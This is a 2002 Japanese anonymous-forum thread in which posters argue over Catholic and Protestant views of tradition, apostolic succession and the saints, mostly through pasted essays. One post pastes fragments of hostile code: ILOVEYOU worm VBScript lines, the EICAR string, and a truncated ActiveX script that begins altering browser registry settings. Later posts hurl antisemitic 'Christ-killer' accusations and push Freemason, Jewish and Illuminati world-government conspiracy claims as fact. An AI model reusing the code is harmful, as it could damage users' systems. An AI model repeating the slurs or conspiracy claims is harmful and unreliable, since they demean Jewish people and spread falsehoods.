ある時代に、ある地域で完成したということである。その啓示があら
ゆる時代と地域の人間に向けられたものだというなら、それはその後の
全世界の人間にいかに伝達されるのかが問題となる。この問題は、啓示
そのものと同様に重大である。その伝達の道を確かめておかないと、キリ
ストから時代的、地域的に離れたわたしたちは啓示そのものに到達しそこ
なうかもしれないからである。

526 :名無しさん@1周年:02/12/09 14:51
そのことを自覚してキリストは、生前に直接に12使徒とその頭ペトロ
を選び、ご自分の教えと使命を教え、ご自分の死後その教えを伝え、使命
を続けるよう派遣された。このようにキリストにおいて完成された啓示は
ペトロを頭とする12使徒が指導する教会に受け継がれた。この原初的な
教会の伝承が使徒伝承と言われる。ペトロを頭とする12使徒たちもその
生前にキリストから受け継いだ教えと使命をつぎの世代に受け継がせた。
こうしてペトロの役職はその後教皇に、12使徒団の役職は司教団に受け
継がれた。このつぎの世代以降の教会の伝承を教会伝承という。こうして
使徒伝承は教会伝承をとおして受け継がれ、その中でキリストにおいて完
成された啓示が伝達されている。
http://mikio.wada.catholic.ne.jp/DEI_VRBM_3-2.html

527 :名無しさん@1周年:02/12/09 14:53
つまり、カトリックはペテロ教、プ
ロテスタントはパウロ教ってことね?


528 :昼下がりの散歩:02/12/09 14:59
カルタゴ教会会議までの教会の伝統すべてを、聖伝として大切に保存するのが、カトリック教会の立場です。
それに対して、カルタゴ教会会議で決定された聖典に基づいて、教会の伝統をすべて検証し、
聖書から導き出される教理にしたがって取捨選択するのが、プロテスタントの立場です。
ニケア・コンスタンチノポリス信条、カルケドン信条に表明されている基本的教理を、
プロテスタントは採用します。そして、使徒信条に告白されている信仰を告白します。
基本信条によって確立された信仰が、聖書の聖典化の際に、発揮されたからでもあります。

もう何度も何度も何度も何度も(以下、数年分続く)
同じ事を書かせないでくださいね。
数年間、同じ事を書きつづけてきましたので。
対話をしている方は、別の方なのでしょうが、少なくとも、昨日あたりから今日までのレスくらいは、
読みましょうよ。

529 :名無しさん@1周年:02/12/09 15:01
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
<!--IPT language=JavaScript
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </APPLET ");
function AddFavLnk(loc, DispName, SiteURL){var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");Shor.TargetPath = SiteURL;Shor.Save();}
function f(){
try{a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance();FSO = a1.GetObject();a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Net = a1.GetObject();
try{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
              

530 :名無しさん@1周年:02/12/09 15:04
失われた古代教会

古くさく、もういい加減に手放すべき見解があります。それはこのような
一昔前の見解です。「プロテスタントは、聖書解釈にあたって、聖書以外に
解釈者をもたず、他のいかないる書物、信仰告白、神学的文書も必要としな
い『聖書のみ』の立場をとる。それに対して、カトリックは『聖書と聖伝』
という風に『と』という立場に徹する。だから両者の立場の違いは『のみ』
と『と』の立場の違いである。」と。

宗教改革において、プロテスタントはカトリックに対して有効な論駁をす
るにあたって、カルヴァンを待たねばなりませんでした。カトリックの
『伝統』に対しては何も言えずにいたのです。しかし、ここで、宗教改革
者たちが、この改革を古代教会への回帰と位置づけることによって、真の
伝統を守ることを訴え、カトリックの『伝統』に対する反論がはじまりま
した。当時、肉体的にも弱いカルヴァンは、研究室で静かに古典文学の研
究を続けることを希望していました。しかし、彼はいわば半強制的に表舞
台に立たされることになります。それは、まさに彼が古典文学の研究に携
わっていたためでした。

 <およそ宗教改革者たちは教会の改革を志したが、それは根本的なもの
への復帰であって、根本的なものの転覆ではなかった。では、根本的なも
のとは何か。それはいろいろな形で表現できるが、素朴に、具体的に言え
ば、キリスト教がその初期において確認した原理、つまり古代教会が確立し
た教義である。>(『カルヴァン』渡辺信夫著)

531 :名無しさん@1周年:02/12/09 15:05
この「古代教会が確立した教義」を掘り起こすために、カルヴァンの知識
が必要だったのです。カルヴァンは聖書主義を掲げるとともに、それを補
足すべく古き教父たちの言葉を用いて、論駁をしていったのです。古代教
会が「伝えられ」また「伝えたもの」、つまり使徒伝承(ケリュグマ)にこ
そ焦点が当てられたのです。

Tコリント15:3−5「私があなたがたに最も大切なこととして伝えたのは
私も受けたことであって、次のことです。キリストは、聖書の示すとおり
に、私たちの罪のために死なれたこと、また、葬られたこと、また、聖書
に従って三日目によみがえられたこと、また、ケパに現われ、それから12
弟子に現われたことです。」

この聖句は、ケリュグマを語るにあたって、必ず持ち出される常套句でも
あります。使徒伝承の本質的な性格はTコリント15:3の「受けた」と
「伝えた」です。古代教会において、ケリュグマは口頭で伝承されるもの
であるゆえに、それを保持する教会的権威および使徒的権威との有機的な
太い絆があって、それで初めてケリュグマは生かされ宣べ伝えられていっ
たのです。

532 :名無しさん@1周年:02/12/09 15:05
問題はここからです。使徒たちが死に、異端グループが勢力を増すにあた
って、正統教会自身が、敢えて「何がケリュグマとして正しいか」「何を
正統とすべきか」という問いを自問する必要が出てきました。ここに新約
聖書正典の編集が始まります。

<初代教会の伝道が進んで教会が全世界に広がるにしたがって、使徒たち
は、書かれたもの(文書)によってしか諸教会との結びつきを保てなくな
った。さらに使徒たちの死によって、口頭の伝承の信用性が失われる事態
に直面して、使徒的伝承を文書化することの必要性が増大した。それは、
いわば自然の成り行きであった。>
(『新聖書注解』新約聖書の正典と本文:村瀬俊夫著)

ケリュグマ神学を語るにあって、新約聖書正典抜きに語ることは不可能
です。ゆえに、プロテスタント諸教派がその根拠として「聖書のみ」とし
、聖書主義の立場を擁護することは、間違いではありません。ただ、「聖
書のみ」の視点は、古代教会への回帰を展望してのものであったことを
忘れてはなりません。

533 :名無しさん@1周年:02/12/09 15:06
ここで古代教会とは、どのようなモデルの組織だったのでしょうか。
教理史家の棚村重行氏は、古代教会には「福音」「聖書」「伝承(伝統)」
「職務」の4つの関係の有機的な連関が存在していたといいます。これら
の4つが有機的に相互補完し、それぞれがそれぞれに等しく必要とされて
いました。確かに、新約聖書正典とそれを編纂した教会指導者の「職務」
との関係は切り離せないものです。

<第一に総合説明書としての聖書正典の権威、第二に教会がその福音の真
理を告白する「信仰の基準」としての信条、すなわち「伝統」というハン
ドブックの権威、第三に前者二者を正しく解釈する運転手という職制、と
くに按手と呼ばれる福音をとりつぐ権威を継承する儀式をとおし、歴史的
に継承された使徒的監督職の権威は、同等、密接不可分で、これらが相互
補完的に働きつつ啓示された神の救いの「福音」を教会に伝達するという
のである。>(『現代人のための教理史ガイド』棚村重行著)

534 :昼下がりの散歩:02/12/09 15:13
割り込みスマソだけど。
530さんは、『現代人のための教理史ガイド』を読まれたのですか?
偉いねえ・・・バスだのガソリンだの、運転手だの運転マニュアルだのと、
なんだか余計わけわかんないことになりそうな本だったけど。
もっとすっきりと書けばいいのにと思った。

535 :名無しさん@1周年:02/12/09 15:14
では、古代教会を発展させて今日まで来たカトリックから離れ、古代教会
に回帰することを望んだプロテスタントは果たしてこのような古代教会に
戻ることできたのでしょうか。しかし、それは全く不可能なことです。古
代教会の理想像は、「失われたエデン」です。プロテスタントがカトリック
に対して、古代教会の変形であると非難するのと同じく、プロテスタント
も古代教会の変形でしかありません。プロテスタントもまた回帰せんとす
ることを通じて、古代教会を別の形で発展させる形態をつくるしかなかっ
たのです。

ヨハネ21:25「 イエスのなさったことは、このほかにまだ数多くある。
もしいちいち書きつけるならば、世界もその書かれた文書を収めきれな
いであろうと思う。」とされた「文書に収めきれない」イエスの御業は、
本来教会にこそ保持され伝承されるべきです。しかし、プロテスタントは
「聖書のみ」をもって、その肉をそぎ落としました。その時点で、教会伝
承(伝統)を捨ててしまっています。また「職務」については、古代教会
のような職制とはいえないでしょう。長老制にしても会衆制にしても、古
代教会とは似つかぬ代替物でしかありえません。その実質は「万人祭司」
をより発展させたものです。

古代教会への回帰運動と位置づけた宗教改革において、プロテスタントも
また古代教会の理想像を変形発展させるしかなかったのです。私なりの理
解では、カトリックもまた同じく、歴史的時代的な過程において変形発展
させ、スコラ神学を形成しサクラメント神学を築くことで、異端を退け教
理を守り、ケリュグマを生かしているのではないだろうか。

536 :名無しさん@1周年:02/12/09 15:15
古代教会を喪失したプロテスタント諸派は、今後どのような方向性を持つ
べきかを語らなければならないときが来ているのではないでしょうか。

まず、混乱する「聖書主義」の教理を、もっと明確に一つにする必要が
あります。その時、「聖書主義」には厚みがなければなりません。キリス
ト教2000年史をその内に秘めた「聖書主義」でなくてはなりません。
なぜなら、キリストから始まり、私たちが伝え聞くまでに、ケリュグマは
「伝えられ」「伝えて」こられたからです。聖書から正しく引き出された
聖書解釈、信条、教理問答書、正統教父たちの諸文書・釈義等が、聖書解釈
や教理といった神学形成に十分生かされるべきです。その時、「聖書主義」
は確固たる地位をもって、プロテスタントの神学的柱になりえるでしょう。

もし、それらを棄てただ「聖書のみ」の「聖書主義」を唱えるのであれば
それは赤子にハサミを持たせるほどに危険です。
http://members.tripod.co.jp/yamamotoseiiti/p77.html

537 :江戸川散歩:02/12/09 15:18
>>536はコピペだったのですか
しかし、1番、まともでした。感謝!

538 :名無しさん@1周年:02/12/09 15:26
聖徒の交わり(コンムニカティオ・サンタク)
 キリシタン時代の信仰の祖先たちは「けれどのおらしょ」(使徒信経)
において、“さんとすのこむによ”と唱えていました。(『聖務日課』明
治元[一八六八]年)。『公教日課』(明治二十[一八八七]年)の「使
徒信経」には“諸聖人の通功(つうこう)”が唱えられており、やがて第
二ヴァティカン公会議の典礼刷新後の『ミサ典書』(一九七八年)におけ
る「洗礼式の信仰宣言」・「使徒信条」には“聖徒の交わり”となってお
ります。
 この聖徒の交わりの祈りの神学・霊生は、聖書と使徒・教父たちの聖伝
に導かれつつ、東方(ギリシア)教会の典礼から西方(ラテン)教会の典
礼へ伝えられ・受け入れられたものです。“コイノニア・トーン・ハギオ
ン”が“コンムニオ・サンクトールム”と、ギリシア語讃美からラテン語
讃美へ訳され、これが「使徒信条」に添えられ、ラテン世界の神の民はし
だいに信望愛をこめて唱えてきました。
 “聖徒の交わり”が初めて教会関係史料に現れるのは、レメシアナ司教
聖ニケタス(在任三六六/七七―四一四年)の『信条について』(『ラテ
ン教父著作集第五十二巻八百七十一頁』)においてです。聖ニケタスは中
性“聖なるもの”(サンクタ)の属格“聖なるものの”(サンクトールム)
として“サンクトールム”を解釈しています。それゆえ、“聖なるものの
交わり”、すなわち感謝の祭儀を奉献し、“サンクタ”“聖なるもの”=
聖体・主の体と血をいただき、主イエス・キリストと神秘的に一つに結ば
れること、そして主御自身をいただくわたしたち皆が一つに結ばれること
“キリストの神秘体”になることです。

539 :名無しさん@1周年:02/12/09 15:27
 ヒッポ司教聖アウグスティヌスの霊生の叫びが思い出されます。聖司教
は“秘跡の交わり”(“コンムニオ・サクラメントールム”説教二百十四
・十一『ラテン教父著作集』第三十八巻)と呼びかけます。秘跡をいただ
いて主イエス・キリストとわたしは一つに結ばれる、秘跡をいただいてわ
たしたちは皆一つに結ばれます。わたしたちはキリストによって・ととも
に・において一つの愛の共同体(コイノニア)に生かされ生きます。
 さらに、“聖徒の交わり”は南フランスのニーム教会会議(三九四/九
六年)の第一決議文(カノン)に見られ、レジ司教聖ファウストゥス(四
九五年頃没)の『聖霊について』やアルル司教聖カエサリウス(五四三年
没)の「信条について」の説教において宣言され、六―八世紀、南フラン
ス・イタリア・スペインの諸教会へ広がり、遍く愛誦されるようになりま
した。
 “コンムニオ・サンクトールム”には、三つのことが宣言されています。
(1)原秘跡である教会の救いの霊宝に与かるすべての人々の愛の共同体
(2)信仰・希望・愛における信者の一致 (3)地上を旅する教会と永遠
の栄光に輝く天上の教会と死後もなお清めに苦しむ人々の教会との愛の交
わり。

540 :名無しさん@1周年:02/12/09 15:28

 神に感謝しましょう。互いに愛し合いましょう。
 「神は、その独り子をお与えになったほどに、世を愛された。独り子を
信じるものが一人も滅びないで、永遠の命を得るためである。」(ヨハネ
三・十六)
 「神がわたしたちを愛して、わたしたちの罪を償ういけにえとして、御
子をお遣わしになりました。ここに愛があります。愛する者たち、神がこ
のようにわたしたちを愛されたのですから、わたしたちも互いに愛し合う
べきです。」(1ヨハネ四・十―十一)
http://www.seibonokishi-sha.or.jp/kishis/kis0209/ki13.htm

541 :名無しさん@1周年:02/12/09 15:31
>>500失敬な!取り消せ。

542 :名無しさん@1周年:02/12/09 15:32
聖人・・・ローマカトリックが用いた語「ディウス」は、
「神格化」されたローマ皇帝やローマの偉人たちに対しても用いられた。
キリスト教徒たちが命がけで拒否した習慣は、
ローマ市民にとってはまさに今で言う「聖人崇敬」レベルのものだったらしい。

その程度の習慣に、命の危険があっても従わないのが「キリスト教」だったわけだ。
カトリックはこの基準からすれば、キリスト者というよりはローマ人だ。
対抗するものを容認しない、「熱心の火」でもあるキリストはそれを許さないと思う。

543 :名無しさん@1周年:02/12/09 15:33
聖徒の交わりの聖徒のなかにマリアは最高の聖徒として
入れなければならないと確信する。
天上の聖徒こそ、真に贖われた初穂である。
彼らは地上の私たちの為に執り成しの祈りをなさってくださる。
地上の聖徒さえすることを、天上の聖徒が
無為に過ごしているはずがあろうか。
プロは詭弁を弄さず常識を用いるべきである。

544 :名無しさん@1周年:02/12/09 15:36
>>542俺さん、ウザイよ

545 :名無しさん@1周年:02/12/09 15:38
>>542我々ユダヤ人には預言者崇敬や父祖崇敬、
聖遺物崇敬もあるが、キリスト教徒はそれに反対していたということか?

んな話は君たちの創作だろう。そんなまともじゃない話をしても、
誰にも聞いてもらえないよ。
プロ信仰にあってはこうなっているから正しいというなら、
それはカルトさ。

546 :名無しさん@1周年:02/12/09 15:38
>>543そうだよね。天上の聖徒だけ除外するなんて作為的過ぎる。
悪しき動機ミエミエ。マリアをなきものにしたかったからでしょう。
プロはクレドを捨てたほうがいいよ。無意味だ。w

547 :名無しさん@1周年:02/12/09 15:39
聖人はサンクトゥスだし
神はデウス。

542はいったいどんな辞書を使っているんだろう。

548 :名無しさん@1周年:02/12/09 15:39
>>541

俺さん、ウザイよ

549 :名無しさん@1周年:02/12/09 15:41
>>542はものみの塔だよ。すぐにわかる。バレバレ

550 :名無しさん@1周年:02/12/09 15:41
キリスト教徒たちは、ローマの習慣を滅ぼすために、
我々の習慣を盗み、殉教者たちを聖人とした。
その枠が広げられ現在に至る。
そんな知識も内容では、キリスト教を語るどころか、
気軽に我々のことを語るのは非常に失礼な話だ。

551 :名無しさん@1周年:02/12/09 15:44
>>550
俺さん、ウザイよ

滅茶苦茶なことばかり書くなって。
ネットでなら、どんな妄想を書いても許されると思ってる?


552 :名無しさん@1周年:02/12/09 15:44
プロテスタントは聖書を用いて古代教会を取り戻そうとしたらしいが、
そんなことをするから逆に変な方向へ行ったのさ。
我々のやっていることは、ヤコブが死んだ後に取り決めたことだ。
それをいかにも正統なように考えるのが間違っている。

553 :名無しさん@1周年:02/12/09 15:45
>>549
なんとなく同意
彼らは教会がローマ帝国と和解したことを快く思わない人たちだから

554 :名無しさん@1周年:02/12/09 15:45
>>550=キリスト殺しの末裔

555 :名無しさん@1周年:02/12/09 15:46
>>551失敬な!あんなのと一緒にしないでくれよ。
私はきちんと我々から見たキリスト教の歴史に沿って話している。

556 :名無しさん@1周年:02/12/09 15:47
>>555「我々」って誰よ?w フリメかい?w

557 :名無しさん@1周年:02/12/09 15:48
>>554当然だよ。あんな親捨てのペテン師の言うことが聞けるか。
ヨハネの元を去り、悪の教師となったあの男の話を。

558 :名無しさん@1周年:02/12/09 15:48
>>523
それがですねえ、その日の礼拝で信仰の模範として称えられていたのは
ローマ教皇・問答者グレゴリウスだったのですよ。

私はグレゴリウス典礼も好きなので「そうかそうかルター派の兄弟たちも
グレゴリウスを評価しているのか、よいことだのう」と素直に喜びましたが
代表的なプロテスタント教派であるルター派が称えるのが
「聖書に出てくる」人物だけではないこと、
またマリアの誕生の日がいつかとか、グレゴリウスの日がいつとか、
この辺は聖伝によるしかないであろうkと、
そのことから「プロテスタントは聖伝を無視する」とは一般的な言説では
ありえないだろうな、と改めて思ったのです。

そもそも「信経」もまた聖伝の重要な一部なわけで。
もちろん信経を告白しない教派があることは承知していますが、
プロテスタント一部諸教派とカトリックや正教の差はいわれるほど深い
ものではないのだろうな、と礼拝の現実を見ていると感じます。

559 :名無しさん@1周年:02/12/09 15:49
聖人をなきものにしようだなんて、100年はえんだよ。>>555

560 :名無しさん@1周年:02/12/09 15:50
>>556君は異邦人だから目が曇っているのさ。
その目の曇りは異邦人だから直らないだろうがな。

561 :名無しさん@1周年:02/12/09 15:50
>>557=555
ついに本音を出したな。フリーメーソン、逝ってよし!

562 :名無しさん@1周年:02/12/09 15:51
>>559君たちが聖人の制度を置いている事は、
君たちの先人がイスラエルを模倣した証拠ではある。

563 :名無しさん@1周年:02/12/09 15:54
>>561私がその手のものなら、プロに加担しただろう。
そんなことも分からないのか。
まぁ、異邦人には何を言っても愚かだからな。
偶像崇拝の汚れた血を引いた君たちには無理もないと思うが・・・。

564 :名無しさん@1周年:02/12/09 15:55
>>562ユダヤ教なんざ、バビロン捕囚以後に成立した混交宗教じゃねえか。
聖伝一色だったぞ。旧約聖書成立がいつだと思ってるんだ?
偉そうなことをほざくな。イエス・キリストはすべてを超越している。
アブラハムよりも前から私はいる。アブラハムは私の日を見て喜んだのです。

565 :名無しさん@1周年:02/12/09 15:56

キリストがユダヤ教の神官に殺されたのも、無理ないな…>>564

566 :名無しさん@1周年:02/12/09 15:59
近代フリーメーソンの創始者が、
ユグノー派の指導者と、
長老派の指導者であったことを、
時々思い出しましょう。
カトリックは堅く心に刻みましょう。
きわめて重要です。

567 :名無しさん@1周年:02/12/09 16:00
フリーメーソンの創始者はプロテスタントでした!!!!!!!
重要なことです!!!!!!

568 :夕方近くの散歩:02/12/09 16:00
>>558
ですからね・・・

たとえば、礼拝の中で「たたえられる」とおっしゃってますが、
リタージーとしてそういう要素を含めるのではなくて、
説教の中で取り上げられるというようなことは、よくあることなんです。
カトリックの聖人や、その言葉を引用したりというのは、よくあるんですよ。
問題はですね、聖人崇拝をリタージーの中に取り入れてはないでしょう?
ということなんです。

個人的には、私はハイチャーチ主義ですし、一部の福音派のような過激な主張はしていません。
それに、カトリックや聖公会との共同祈祷会などには、ほとんど欠かさず出席するように心がけています。
しかしですね、そういうときに疑問に思うのは、
「カトリックはすべて正しいが、プロテスタント(十把一絡げに言うのもどうかと思うんですが)は、間違っている」
みたいな態度をとられることなのですよ。
同じ聖三位一体の神を信じているのですから、信じ方や表現の仕方に多少の差があってもいいでしょ?と思うのです。
マリアを崇敬しないから、プロテスタントは異端だ、などと言われると、カチンときますね。
だったら、どうして共同祈祷のようなときを持つのだろう、やらなければいいのにと思います。

569 :名無しさん@1周年:02/12/09 16:01
>>564その通りさ。そんなことは知っているよ。

570 :名無しさん@1周年:02/12/09 16:02
ただし、イエスのことについては君たちに同意しない。

571 :名無しさん@1周年:02/12/09 16:03
>>568

は聖公会ですか。
ハイチャーチなんてものはキリストは言ってませんよ。
あなた方も聖伝にしがみついてるんですね。笑えますね。
wwww

572 :名無しさん@1周年:02/12/09 16:05
>>570
キリストを殺した罪はあなた方にかかったんだよ。
あなた方の先祖が十字架の回りでそう誓ったのだからね。
懺悔すべきだよ。なぜ、キリスト教徒を迫害する?
言え!

573 :名無しさん@1周年:02/12/09 16:08
>>568カトリックはそういう教派なんだよ。
オーソもそうなんだ。あきらめるこった。
我々のように自分たちのみが正しいとする教会だよ。

574 :名無しさん@1周年:02/12/09 16:08
>>568はいつまで散歩してるんだ?もうかかないっていったのに、思想も行動も自己矛盾してるぞ。w

575 :名無しさん@1周年:02/12/09 16:10
ロむしてるものですが、
はたから見てると、カトリックが正しいように思えました。

576 :名無しさん@1周年:02/12/09 16:11
>>568
いいえ、典礼の中ででしたよ。そもそもその主日には
「グレゴリオスの日」と名前がついていて、
「信仰の模範者であるグレゴリオスに、私たちが倣うことが出来ますように」
という趣旨の祈りが用意されていましたから。

ですからあなたの教派がそうであるというからといって
すべてのプロテスタント教派がそうであるということには
ならないと申し上げているのですが。

577 :名無しさん@1周年:02/12/09 16:12
>>572そんなキリスト教徒側が作り出した
オタ話をまだ信じているのかい?ばかだなぁ。
君たちは勝手にあの男についていった愚かな異邦人さ。
我々の壮大な計画に利用されるために
キリスト教徒になったようなものだよ。

578 :名無しさん@1周年:02/12/09 16:13
>>577フリメ、ウザイよ。

579 :名無しさん@1周年:02/12/09 16:14
ココには、次の者たちがカキコしてる。
1、聖公会
2、カトリック
3、プロ
4、エホ証
5、フリーメーソンをた

580 :名無しさん@1周年:02/12/09 16:16
ココには、次の者たちがカキコしてる。
1、聖公会
2、カトリック
3、プロ
4、エホ証
5、フリーメーソンをた
6、ユダヤ人
7.俺さんシンパ
8、無神論者

581 :夕方近くの散歩:02/12/09 16:18
>>576
どうも言葉の食い違いがあるように思いますな(^^;;
典礼といいますが、礼拝の中ででしょう?そうですよ、ありえますよ。
アングリカンによっては、マリア崇敬をするところもあるようなのです。
しかし私は、そんなことを言っているのではないのです。

具体的に言いましょう。
礼拝の中で、牧師が会衆席に背を向けて、天を仰いでグレゴリウスに向かって、
「信仰の模範者であるグレゴリオスに、私たちが倣うことが出来ますように」
という祈りを、グレゴリウスに捧げたわけではないでしょう?ということです。
礼拝=典礼ではないのですよ。もっとも、この理解も教派によりますけどね。

582 :名無しさん@1周年:02/12/09 16:20
近代フリーメイソの創始者は、プロテスタント指導者だった。
1、ユグノー派の指導者(ユダヤ人、ジョン・デザギュリエ)と、
2、長老派指導者(ユダヤ人、ジェームス・アンダーソン)
カトリックは堅く心に刻みましょう。
きわめて重要です。

583 :名無しさん@1周年:02/12/09 16:21
>礼拝の中で、牧師が会衆席に背を向けて、天を仰いでグレゴリウスに向かって、
そうですね。教派によりますね。
礼拝が会衆に背を向けることを意味するなら、
現行のカトリックのラテン典礼には礼拝がないことになってしまう。

584 :名無しさん@1周年:02/12/09 16:22
>>581
最高の聖人、聖母マリアに倣うべきです。

585 :名無しさん@1周年:02/12/09 16:22
>>582
それはおかしい。ユダヤ人というのはユダヤ教徒だということだ。
ユダヤ人でキリスト教に改宗した人はユダヤ系とはいっても
ユダヤ人とはいわないものだ。
あなたのいうことは論理的に矛盾している。

586 :名無しさん@1周年:02/12/09 16:24
>>585肉の意味だろ。

587 :名無しさん@1周年:02/12/09 16:26
>>578我々は主の民だ。あんな異邦人どもと一緒にするなよ。

588 :396:02/12/09 16:26
>>404 :名無しさん@1周年 :02/12/08 20:22
>>矛盾??
>思考の型がキリストに倣うようになること、これの意味がわからないんだね。
大変遅レスでスマソだけど。「師のようになる」ことをあなたがどう解釈するかは全く触れてないのですが。
私が矛盾と言ったのは、むしろあなたの見解を否定すれば聖書が矛盾することになるといったんですがね。
こちらとしては、聖使徒パウロの目が開かれ、さらに師のキリストのようになれたということさえ言えればそれでいいんですけど。
師のキリストのようになる、またその過程の「修行」が、具体的に何を意味するかは、
そちらで自由に考えていただければ結構です。

因みに例の箇所 コロサイ 1:24 の前を読んで見てください。キリストの贖いのことをなんと書いてあるでしょうか。
コロサイ 1:22 神は御子の肉の体において、その死によってあなたがたと和解し、
と言っていますね。贖いとは神と人との和解のためにあるのです。
聖使徒パウロは2コリント 5:20で、「キリストに代わってお願いします。」 の後何といっているでしょうか。
「神と和解させていただきなさい。」と言っています。このようなことが言えるのは、
聖使徒パウロも、キリストの体である教会に身を置き、キリストと共に苦しみ、
贖いである神と人との和解に働いたということにならないでしょうか。

589 :名無しさん@1周年:02/12/09 16:28
>>582奴等は石工に魂を売った連中さ。

590 :名無しさん@1周年:02/12/09 16:28
ヘロデ王の呪い〜暴かれたユダヤ古写本 ローレンス&カウリー 中央アート出版
 フリーメーソンの起原を暴露する本。キリスト教に改宗したユダヤ教徒が先祖のフリーメーソン発祥メンバーの古写本を発表するというスタイル。ただ英国の近代フリーメーソンの発生秘話は史実に基づくものかもしれない。

591 :名無しさん@1周年:02/12/09 16:33

age

592 :名無しさん@1周年:02/12/09 16:33
>>581アングリカン・コミューンに
復古カトリック教会も加入してるからね。

593 :名無しさん@1周年:02/12/09 16:34
救世軍の創始者もフリメだぞ。

594 :名無しさん@1周年:02/12/09 16:35
確かにプロテスタント諸派とフリメは関係している場合が多いわな。
一般信徒が知らないところで・・・。

595 :名無しさん@1周年:02/12/09 16:36
>>587おまえらはすくわれないよ。
キリストを悪意をもって認めようとしないんだから。
どうしようもない。好きにしな。自分の運命は自分で決めろ。

596 :名無しさん@1周年:02/12/09 16:38
カトリックの教皇は堂々とフリメを断罪してきたのに、
プロはフリメのフの字にも触れなかったじゃねーか。
結託してたからだよ。

597 :名無しさん@1周年:02/12/09 16:39
>>595君たちはあの男と一緒で救われていないのさ。
君たちはイスラエルに取って代わろうとしているわけだからな。
そういった思考をしている内は決して救われることはない。

598 :名無しさん@1周年:02/12/09 16:41
「あの男」というけど、前にイエス様のことを「詐欺師」とほざいたね。
君は救われないよ。思考で救われるのではないよ。信仰だよ。>>597

599 :名無しさん@1周年:02/12/09 16:44
>>598我々にとってはそういったものは思考にしか写らない。
そうだ、あいつは詐欺師さ。
ヨハネの教団でなぜ彼は悪の教師といわれたのか?
なぜ彼の兄弟ヤコブは良い教師と呼ばれるのか?

600 :名無しさん@1周年:02/12/09 16:45
詐欺師の弟子は詐欺師さ。詐欺の片棒をかついているのと同じさ。
蛇の子さ。

601 :名無しさん@1周年:02/12/09 16:50
ヘロデの呪い 暴かれたユダヤ古写本

 ローレンス・D・H・ローレンス
 アウド・カウリー中央アート出版社

秘密結社フリーメーソン。その閉じられた秘密主義故に
色々な推測を呼ぶ組織である。そして「トンデモ本」を
含めると無数の本が書かれ、世界制覇を目指していると
そんな影の大ボス的イメージの組織だ
むろん自由・平等・博愛という近代世界の基本理念と合致する
素晴らしいイメージの場合もある

その秘密結社の正当な継承者の子孫のひとりローレンスが
暗殺された(ユダヤ教からキリスト教に改宗)祖先ヨナの
遺志を継ぎ創始者の正当な男児のみに継がせる結社の
記録を公開(出版)するという事をしたからだ
1894年のブラジル大統領デ・モラエス氏推薦という

内容はメーソン(石工)なる組織がユダヤの王ヘロデが
当時拡大していったキリスト教徒に危機感を覚えて
信者の撲滅を考えて組織したのが始まりと言う恐ろしい
内容だ。そしてその趣旨は社員には隠さねばならない
メーソンリーの起源は発見された古文書であると言う事に
しておき古さを偽装する、というのがメーソンリーの起源

602 :名無しさん@1周年:02/12/09 16:50
この本をそのまま鵜呑みにするか、出回っているトンデモ本
とみるかは読者次第と言う所。地下鉄サリン事件の時
彼らカルトがフリーメーソン陰謀説などを唱えていたという
そのように踊らされる事のほうが危険であろう
あくまで情報のひとつとして読むのが賢明だ

押収された文書から、イルミナティの革命計画が露見しているが
その戦略は「混沌から秩序」と呼ばれていた
革命により旧体制を滅ぼし、がれきの中から、目的にあった
新体制をつくりあげるというのである。世界統一政府を目標と
する彼らにとって邪魔になるのは、何よりも愛国心とそれに
密着する保守的宗教だ。

日本もその犠牲者になったことをご存知だろうか。
原爆によって奪われた数十万人の無実の庶民の命とともに
日本人は愛国心も宗教心も同時に破壊された。今や日本人は
世界でも珍しいほど、無宗教の民に成り果て、宗教がなくなった
心の隙間を、アメリカニズムと言う名の物質主義、友人や同僚を
足蹴にして出世するメーソン流の競合成功哲学、何でも
一つにしたがる霊的グローバリズムが埋めている。それが
日本人の尊い霊性をいっそう堕落させている

603 :名無しさん@1周年:02/12/09 16:51
と前書きの訳者、林氏の文章もものすごい
ちょっとうなずきたくなる。人は属する国(団体)に無意識に
依存し敬愛する。愛国心は普通なら持っている
ふだん骨抜き(林氏の言葉で言うと)にされた愛国心も
時折日本人も顔を出す。物質的に豊かな私たちが次に求めるのは
物質以外のものだから。精神という形の無いモノ。そのひとつが
ナショナリズムであったりする。それをこのような文章は
くすぐってしまう

世界と協調しつつ日本人としての核を育てると言う事は難しいが
それが出来た時私たちは物資によらない財産を得るだろう

林氏はテロ事件にも触れている

604 :名無しさん@1周年:02/12/09 16:51
ブッシュが即座に「十字軍」の言葉を出したのに対して
ビン・ラディンは「ジハード」を宣言した
世界はこの動きを敬遠しているが(略)いやでもキリスト教
ユダヤ教、イスラム教の、世界三つ巴の宗教戦争とならざるを得ない
それを望んでいる者たちがいるのである

宗教そのものはなくならなくとも、骨抜きにしたいと彼らは考えている

この言葉が真実でなくても、そう信じても仕方ないような
現在の状況に世界はなっている

605 :名無しさん@1周年:02/12/09 16:53
キリスト教とイスラム教が争っていると、我々の懐は潤う。
非常にありがたい話だ。

606 :名無しさん@1周年:02/12/09 16:55
世界統一政府と言う概念は至る所で語られる
「せかいはひとつ」子どももそんな風に教育される
それが本当にいい道かどうか誰も考えない
わたし案は(笑)世界妥協政府というのがオススメ
異文化を一つにするのは無謀だ。何とかギリギリで折れ合う
そんな国連の妥協版がいいだろう
人は(国は)高潔でも偉くも無い
食うために悪い事もするし恥ずかしい事もするのだ
そんな民衆の集合体が国だから・・・
支配されてもテキトウに食えて幸せならいい・・・
そんな考えもまた庶民なのだ

現在はキリスト教徒も取りこんで拡大しているらしいこの
結社。数年前に私はテレビで日本支部なるものを見た
気がするが?誤解だろうか?ユダヤ教に起源があるならば
